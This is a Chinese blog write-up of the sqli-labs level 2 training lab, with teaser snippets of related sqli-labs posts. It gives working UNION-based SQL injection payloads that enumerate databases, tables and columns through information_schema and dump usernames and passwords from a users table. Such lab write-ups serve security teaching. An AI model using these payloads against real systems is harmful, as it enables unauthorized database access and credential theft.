2. 程式人生 > 其它 >sqli-labs-2

sqli-labs-2

阿新 發佈:2021-12-17

開啟網站

測試注入點和注入型別

?id=1

?id=3-2結果與?id=1結果一致
所以該關卡是數值型注入

**使用and 1and 0測試注入點 **
1.

2.

經過上面兩個條件的測試,所以id為注入點

測試回顯列數和回顯資訊

回顯4列報錯,所以回顯的列數是3列

利用 union select 1,2,3 回顯資訊

利用information_schema資料庫獲取資訊

1. 獲取資料庫版本、使用者名稱資訊、當前資料庫等資訊

2. 獲取所有資料庫的資訊

?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata

3. 獲取security資料庫中所有表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

3. 獲取users表中的欄位

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"

4. 獲取users表中的資訊

?id=-1 union select 1,2,group_concat(concat(username,'密碼為:',password)) from users

本文來自部落格園,作者:oldliutou,轉載請註明原文連結:https://www.cnblogs.com/oldliutou/p/15702601.html

相關推薦

sqli-labs-2

開啟網站 測試注入點和注入型別 ?id=1 ?id=3-2結果與?id=1結果一致 所以該關卡是數值型注入

Sqli-labs2關 SQL注入 Writeup

Sqli-labs2關 SQL注入 Writeup 關卡簡介 關卡提示:GET-Error based - Intiger based 注入位置:GET

Sqli-Labs Less12:POST注入

開啟bp抓包 傳送至Repeater,新增 \\ 進行測試 根據報錯:222\") 猜測查詢語句: select uname,passwd from table where uname=(“xxxx”) and passwd=(“xxxx”)

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或 無閉合符號 或 \'),\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

sqli labs less 14

進行了一系列的試探,發現輸入雙引號後報錯,通過這個報錯資訊基本可以確定為雙引號閉合語句。如果不放心,可以在輸入雙引號加括號進行試探。

sqli-labs 18-19 --Header_injection

sqli-labs 18 知識點 頭部注入 報錯注入 使用的函式: updatexml (XML_document, XPath_string, new_value);

sqli-labs 20-22 --cookie注入

異常處理 一開始開啟這個題目的時候找不到cookie... 登入成功就是沒有cookie cookie注入沒有cookie...

sqli-labs第十八題

檢視題目 基於錯誤的請求頭注入 一個登入表單,顯示了ip地址。 測試一通毫無頭緒。。。看看原始碼

Sqli-labs 1-10

Less 1-4(基礎注入) 基礎知識: table_schema:資料庫的名稱 table_name:表的名稱 column_name:列的名稱

sqli-labs第七關

1、首先判斷注入點 正常顯示是這樣的不正常顯示是這樣的猜到最後,注入點是字元型,單引號加兩個小括號,?id=1’)) – -因為它只有正常顯示和不正常顯示兩種狀態,並且也沒有MySQL的報錯資訊。正常來說,這

sqli-labs Less-18/ Less-19 POST-Header Injection

Less-18 POST-Header Injection-Uagent field-Error Based POST方式,頭部 User-Agent: 注入 Less-19 POST-Header Injection-Referer field-Error based POST方式,頭部 Referer: 注入 Less-18 / Less-19 方

SQLI-LABS靶場環境搭建詳細流程

準備工作 需要虛擬機器一臺: 我用的是Win2008R2企業版 Web容器: phpstudy2016 額外需要安裝VC9_x86 32位 為了配合phpstudy2016版本中版本較低的php環境, 所以需要提前安裝好32位的VC9

sqli-labs 21-37關卡

less 21 “基於’)字元型的Cookie注入” 注入語句: 1’) union select 1,database(),3# 編碼:MScpIHVuaW9uIHNlbGVjdCAxLGRhdGFiYXNlKCksMyM=

sqli-labs通關Less 1-4

sqli-labs通關Less 1-4 實驗工具:phpstudy pro, Firefox MySQL 5.7.26 Nginx 1.15.11 PHP 5.4.45 注意:sqli-labs-master配置正確的情況下,建立實驗資料庫出錯,可能是由於php版本造成,可試著更改其版本

sqli-labs 7_通過“ Galaxy Labs”搶先體驗Galaxy S7的新功能

sqli-labs 7 Trying new things is always fun, especially when it comes to tech. Getting hands and eyes on new features before they become mainstays is even more exciting. Not only that,

sqli-labs第一關:基於錯誤的GET單引號字元型注入

點進去題目:提示我們輸入題目id,第一題,所以我們輸入?id=1,回車即可。如圖:首先可以判斷這裡接受的是一個GET請求,先在1後面加一個’ 發現報錯,說明這裡沒有過濾掉引號,所以這裡是一個注入點 SQL注入

sqli-lbs-2 GET - Error based - Intiger based (基於錯誤的GET整型注入)

知識點:1,判斷是數字型還是字元型,單引號還是雙引號 2,union select聯合查詢注入 3,payload原理與防禦措施

sqli-labs Less7 匯出檔案字元型注入

Less-7 GET - Dump into outfile - String (匯出檔案GET字元型注入) 匯出到檔案就是可以將查詢結果匯出到一個檔案中,如常見的將一句話木馬匯出到一個php檔案中,常用的語句是:select “<?php @eval(

sqli-labs 通關指南:Less 27、28

Less 27 和 Less 28 都涉及到了對 “SELECT” 和 “UNION” 的過濾,根據情況我們可以採用大小寫過濾或者用其他編碼打亂過濾的句式。